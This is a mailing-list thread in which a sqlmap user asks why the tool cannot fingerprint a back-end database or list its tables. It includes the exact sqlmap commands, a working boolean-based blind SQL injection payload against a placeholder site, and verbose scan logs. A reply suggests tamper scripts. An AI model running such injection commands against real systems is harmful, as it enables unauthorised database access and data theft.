Propably has something to do with this.
16:38:17] [WARNING] HTTP error codes detected during testing:
400 (Bad Request) - 1 times, 500 (Internal Server Error) - 9 times
Did you try the tamper scripts ?
Am 15.12.2012 um 17:10 schrieb Volker Nebelung <
volker.nebel...@rwth-aachen.de>:
Hi,
I am using sqlmap to scan a specific GET parameter of a target site. I know
there is a SQL injection in parameter 2:
python sqlmap.py -u "http://example.net/de/de*/site"; --batch
sqlmap gives me the following result:
…
[16:36:19] [INFO] heuristic test shows that URI parameter '#1*' might be
injectable (possible DBMS: Microsoft Access)
[16:36:19] [INFO] testing for SQL injection on URI parameter '#1*'
[16:36:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:36:29] [INFO] URI parameter '#1*' is 'AND boolean-based blind - WHERE
or HAVING clause' injectable
[16:36:29] [INFO] parsed error message(s) showed that the back-end DBMS
could be Microsoft Access. Do you want to skip test payloads specific for
other DBMSes? [Y/n] Y
[16:36:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:36:29] [INFO] automatically extending ranges for UNION query injection
technique tests as there is at least one other potential injection
technique found
[16:37:05] [INFO] checking if the injection point on URI parameter '#1*' is
a false positive
[16:37:11] [INFO] URI parameter '#1*' is vulnerable. Do you want to keep
testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 34 HTTP(s)
requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site
---
[16:37:11] [INFO] testing Microsoft Access
[16:37:13] [INFO] confirming Microsoft Access
[16:37:14] [WARNING] the back-end DBMS is not Microsoft Access
[16:37:14] [INFO] testing MySQL
[16:37:16] [WARNING] the back-end DBMS is not MySQL
[16:37:16] [INFO] testing Oracle
[16:37:17] [WARNING] the back-end DBMS is not Oracle
[16:37:17] [INFO] testing PostgreSQL
[16:37:18] [WARNING] the back-end DBMS is not PostgreSQL
[16:37:18] [INFO] testing Microsoft SQL Server
[16:37:19] [WARNING] the back-end DBMS is not Microsoft SQL Server
[16:37:19] [INFO] testing SQLite
[16:37:20] [WARNING] the back-end DBMS is not SQLite
[16:37:20] [INFO] testing Firebird
[16:37:21] [WARNING] the back-end DBMS is not Firebird
[16:37:21] [INFO] testing SAP MaxDB
[16:37:22] [WARNING] the back-end DBMS is not SAP MaxDB
[16:37:22] [INFO] testing Sybase
[16:37:23] [WARNING] the back-end DBMS is not Sybase
[16:37:23] [INFO] testing IBM DB2
[16:37:24] [WARNING] the back-end DBMS is not IBM DB2
[16:37:24] [CRITICAL] sqlmap was not able to fingerprint the back-end
database management system, but from the HTML error page it was possible to
determinate that the back-end DBMS is Microsoft Access. Do not specify the
back-end DBMS manually, sqlmap will fingerprint the DBMS for you
[16:37:24] [WARNING] HTTP error codes detected during testing:
400 (Bad Request) - 24 times, 500 (Internal Server Error) - 20 times
[*] shutting down at 16:37:24
I am confused at this point: Is sqlmap thinking that the DBMS is MS Access
or not?
When I manually try following URL in my browser "
http://example.net/de/de'/site" I get a 500 HTML-page with output
"Microsoft JET Database Engine Error …" so I would say the DBMS is MS
Access.
When I now try to get for example all tables, then following happens:
python sqlmap.py -u "example.net/de/de*/site" --batch --tables
sqlmap/1.0-dev-0664e72 - automatic SQL injection and database takeover
tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting at 16:38:02
[16:38:05] [INFO] custom injection marking character ('*') found in option
'-u'. Do you want to process it? [Y/n/q] Y
[16:38:05] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site
---
[16:38:07] [INFO] testing MySQL
[16:38:08] [INFO] heuristics detected web page charset 'ascii'
[16:38:08] [WARNING] the back-end DBMS is not MySQL
[16:38:08] [INFO] testing Oracle
[16:38:09] [INFO] heuristics detected web page charset 'ISO-8859-2'
[16:38:09] [WARNING] the back-end DBMS is not Oracle
[16:38:09] [INFO] testing PostgreSQL
[16:38:10] [WARNING] reflective value(s) found and filtering out
[16:38:10] [WARNING] the back-end DBMS is not PostgreSQL
[16:38:10] [INFO] testing Microsoft SQL Server
[16:38:11] [WARNING] the back-end DBMS is not Microsoft SQL Server
[16:38:11] [INFO] testing SQLite
[16:38:12] [WARNING] the back-end DBMS is not SQLite
[16:38:12] [INFO] testing Microsoft Access
[16:38:12] [INFO] confirming Microsoft Access
[16:38:13] [WARNING] the back-end DBMS is not Microsoft Access
[16:38:13] [INFO] testing Firebird
[16:38:14] [WARNING] the back-end DBMS is not Firebird
[16:38:14] [INFO] testing SAP MaxDB
[16:38:15] [WARNING] the back-end DBMS is not SAP MaxDB
[16:38:15] [INFO] testing Sybase
[16:38:16] [WARNING] the back-end DBMS is not Sybase
[16:38:16] [INFO] testing IBM DB2
[16:38:17] [WARNING] the back-end DBMS is not IBM DB2
[16:38:17] [CRITICAL] sqlmap was not able to fingerprint the back-end
database management system. Support for this DBMS will be implemented at
some point
[16:38:17] [WARNING] HTTP error codes detected during testing:
400 (Bad Request) - 1 times, 500 (Internal Server Error) - 9 times
[*] shutting down at 16:38:17
Even when i try to use --text-only or --not-string switches I am not able
to receive the tables. Any ideas?
Best regards
Volker Nebelung
------------------------------------------------------------------------------
LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
Remotely access PCs and mobile devices and provide instant support
Improve your efficiency, and focus on delivering more value-add services
Discover what IT Professionals Know. Rescue delivers
http://p.sf.net/sfu/logmein_12329d2d
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
------------------------------------------------------------------------------
LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
Remotely access PCs and mobile devices and provide instant support
Improve your efficiency, and focus on delivering more value-add services
Discover what IT Professionals Know. Rescue delivers
http://p.sf.net/sfu/logmein_12329d2d
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
